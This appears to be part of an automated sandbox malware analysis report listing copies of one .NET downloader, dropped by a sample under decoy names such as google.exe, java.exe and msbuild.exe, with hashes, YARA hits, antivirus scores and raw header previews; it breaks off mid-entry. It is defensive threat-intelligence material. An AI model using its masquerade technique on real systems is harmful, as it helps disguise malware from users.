                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\google.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v(.g..............0.............n.... ........@.. .......................@............`.....................................W.......*...............HQ... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...*...........................@..@.reloc....... ......................@..B................P.......H........=..........J.....................................................r...e..s-p#..Ez../8T.&L..B..8..7..h.....Cd.$Yd..y...'...w,vK.q....j..>.#...e..0S......=L.........s..q,.Y..".....f{..<......?|..*l......:..e....;c..e&.....To.LB.'.U..X.s.k..>K..6...`. B...|.t.0....q4......8.QH*..*........5.l;{.`......^k,.zRCW.9.c.J.L..f,j..]s..}..o..$.Ph.e.VY'^.>.iy.Q....B.%R.+)...D..A.2.{..(.........q-r.g...T.&nM|............!.n../.fIF.Lj>..SF..5`.5....5Xx:.....C....|"..

                                    C:\Users\user\OneDrive\google.exe:Zone.Identifier

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:modified
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0

                                    C:\Users\user\OneDrive\internet explorer.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\internet explorer.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v(.g..............0.............n.... ........@.. .......................@............`.....................................W.......*...............HQ... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...*...........................@..@.reloc....... ......................@..B................P.......H........=..........J.....................................................r...e..s-p#..Ez../8T.&L..B..8..7..h.....Cd.$Yd..y...'...w,vK.q....j..>.#...e..0S......=L.........s..q,.Y..".....f{..<......?|..*l......:..e....;c..e&.....To.LB.'.U..X.s.k..>K..6...`. B...|.t.0....q4......8.QH*..*........5.l;{.`......^k,.zRCW.9.c.J.L..f,j..]s..}..o..$.Ph.e.VY'^.>.iy.Q....B.%R.+)...D..A.2.{..(.........q-r.g...T.&nM|............!.n../.fIF.Lj>..SF..5`.5....5Xx:.....C....|"..

                                    C:\Users\user\OneDrive\internet explorer.exe:Zone.Identifier

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0

                                    C:\Users\user\OneDrive\java.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\java.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v(.g..............0.............n.... ........@.. .......................@............`.....................................W.......*...............HQ... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...*...........................@..@.reloc....... ......................@..B................P.......H........=..........J.....................................................r...e..s-p#..Ez../8T.&L..B..8..7..h.....Cd.$Yd..y...'...w,vK.q....j..>.#...e..0S......=L.........s..q,.Y..".....f{..<......?|..*l......:..e....;c..e&.....To.LB.'.U..X.s.k..>K..6...`. B...|.t.0....q4......8.QH*..*........5.l;{.`......^k,.zRCW.9.c.J.L..f,j..]s..}..o..$.Ph.e.VY'^.>.iy.Q....B.%R.+)...D..A.2.{..(.........q-r.g...T.&nM|............!.n../.fIF.Lj>..SF..5`.5....5Xx:.....C....|"..

                                    C:\Users\user\OneDrive\java.exe:Zone.Identifier

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0

                                    C:\Users\user\OneDrive\jdownloader.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\jdownloader.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v(.g..............0.............n.... ........@.. .......................@............`.....................................W.......*...............HQ... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...*...........................@..@.reloc....... ......................@..B................P.......H........=..........J.....................................................r...e..s-p#..Ez../8T.&L..B..8..7..h.....Cd.$Yd..y...'...w,vK.q....j..>.#...e..0S......=L.........s..q,.Y..".....f{..<......?|..*l......:..e....;c..e&.....To.LB.'.U..X.s.k..>K..6...`. B...|.t.0....q4......8.QH*..*........5.l;{.`......^k,.zRCW.9.c.J.L..f,j..]s..}..o..$.Ph.e.VY'^.>.iy.Q....B.%R.+)...D..A.2.{..(.........q-r.g...T.&nM|............!.n../.fIF.Lj>..SF..5`.5....5Xx:.....C....|"..

                                    C:\Users\user\OneDrive\jdownloader.exe:Zone.Identifier

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0

                                    C:\Users\user\OneDrive\microsoft office.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\microsoft office.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v(.g..............0.............n.... ........@.. .......................@............`.....................................W.......*...............HQ... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...*...........................@..@.reloc....... ......................@..B................P.......H........=..........J.....................................................r...e..s-p#..Ez../8T.&L..B..8..7..h.....Cd.$Yd..y...'...w,vK.q....j..>.#...e..0S......=L.........s..q,.Y..".....f{..<......?|..*l......:..e....;c..e&.....To.LB.'.U..X.s.k..>K..6...`. B...|.t.0....q4......8.QH*..*........5.l;{.`......^k,.zRCW.9.c.J.L..f,j..]s..}..o..$.Ph.e.VY'^.>.iy.Q....B.%R.+)...D..A.2.{..(.........q-r.g...T.&nM|............!.n../.fIF.Lj>..SF..5`.5....5Xx:.....C....|"..

                                    C:\Users\user\OneDrive\microsoft office.exe:Zone.Identifier

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0

                                    C:\Users\user\OneDrive\microsoft.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\microsoft.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v(.g..............0.............n.... ........@.. .......................@............`.....................................W.......*...............HQ... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...*...........................@..@.reloc....... ......................@..B................P.......H........=..........J.....................................................r...e..s-p#..Ez../8T.&L..B..8..7..h.....Cd.$Yd..y...'...w,vK.q....j..>.#...e..0S......=L.........s..q,.Y..".....f{..<......?|..*l......:..e....;c..e&.....To.LB.'.U..X.s.k..>K..6...`. B...|.t.0....q4......8.QH*..*........5.l;{.`......^k,.zRCW.9.c.J.L..f,j..]s..}..o..$.Ph.e.VY'^.>.iy.Q....B.%R.+)...D..A.2.{..(.........q-r.g...T.&nM|............!.n../.fIF.Lj>..SF..5`.5....5Xx:.....C....|"..

                                    C:\Users\user\OneDrive\microsoft.exe:Zone.Identifier

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0

                                    C:\Users\user\OneDrive\microsoft.net.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\microsoft.net.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v(.g..............0.............n.... ........@.. .......................@............`.....................................W.......*...............HQ... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...*...........................@..@.reloc....... ......................@..B................P.......H........=..........J.....................................................r...e..s-p#..Ez../8T.&L..B..8..7..h.....Cd.$Yd..y...'...w,vK.q....j..>.#...e..0S......=L.........s..q,.Y..".....f{..<......?|..*l......:..e....;c..e&.....To.LB.'.U..X.s.k..>K..6...`. B...|.t.0....q4......8.QH*..*........5.l;{.`......^k,.zRCW.9.c.J.L..f,j..]s..}..o..$.Ph.e.VY'^.>.iy.Q....B.%R.+)...D..A.2.{..(.........q-r.g...T.&nM|............!.n../.fIF.Lj>..SF..5`.5....5Xx:.....C....|"..

                                    C:\Users\user\OneDrive\microsoft.net.exe:Zone.Identifier

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0

                                    C:\Users\user\OneDrive\mozilla maintenance service.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\mozilla maintenance service.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v(.g..............0.............n.... ........@.. .......................@............`.....................................W.......*...............HQ... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...*...........................@..@.reloc....... ......................@..B................P.......H........=..........J.....................................................r...e..s-p#..Ez../8T.&L..B..8..7..h.....Cd.$Yd..y...'...w,vK.q....j..>.#...e..0S......=L.........s..q,.Y..".....f{..<......?|..*l......:..e....;c..e&.....To.LB.'.U..X.s.k..>K..6...`. B...|.t.0....q4......8.QH*..*........5.l;{.`......^k,.zRCW.9.c.J.L..f,j..]s..}..o..$.Ph.e.VY'^.>.iy.Q....B.%R.+)...D..A.2.{..(.........q-r.g...T.&nM|............!.n../.fIF.Lj>..SF..5`.5....5Xx:.....C....|"..

                                    C:\Users\user\OneDrive\mozilla maintenance service.exe:Zone.Identifier

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0

                                    C:\Users\user\OneDrive\msbuild.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\msbuild.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v(.g..............0.............n.... ........@.. .......................@............`.....................................W.......*...............HQ... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...*...........................@..@.reloc....... ......................@..B................P.......H........=..........J.....................................................r...e..s-p#..Ez../8T.&L..B..8..7..h.....Cd.$Yd..y...'...w,vK.q....j..>.#...e..0S......=L.........s..q,.Y..".....f{..<......?|..*l......:..e....;c..e&.....To.LB.'.U..X.s.k..>K..6...`. B...|.t.0....q4......8.QH*..*........5.l;{.`......^k,.zRCW.9.c.J.L..f,j..]s..}..o..$.Ph.e.VY'^.>.iy.Q....B.%R.+)...D..A.2.{..(.........q-r.g...T.&nM|............!.n../.fIF.Lj>..SF..5`.5....5Xx:.....C....|"..

                                    C:\Users\user\OneDrive\msbuild.exe:Zone.Identifier

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0

                                    C:\Users\user\OneDrive\msecache.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\msecache.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v(.g..............0.............n.... ........@.. .......................@............`.....................................W.......*...............HQ... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...*...........................@..@.reloc....... ......................@..B................P.......H........=..........J.....................................................r...e..s-p#..Ez../8T.&L..B..8..7..h.....Cd.$Yd..y...'...w,vK.q....j..>.#...e..0S......=L.........s..q,.Y..".....f{..<......?|..*l......:..e....;c..e&.....To.LB.'.U..X.s.k..>K..6...`. B...|.t.0....q4......8.QH*..*........5.l;{.`......^k,.zRCW.9.c.J.L..f,j..]s..}..o..$.Ph.e.VY'^.>.iy.Q....B.%R.+)...D..A.2.{..(.........q-r.g...T.&nM|............!.n../.fIF.Lj>..SF..5`.5....5Xx:.....C....|"..

                                    C:\Users\user\OneDrive\msecache.exe:Zone.Identifier

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0

                                    C:\Users\user\OneDrive\reference assemblies.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
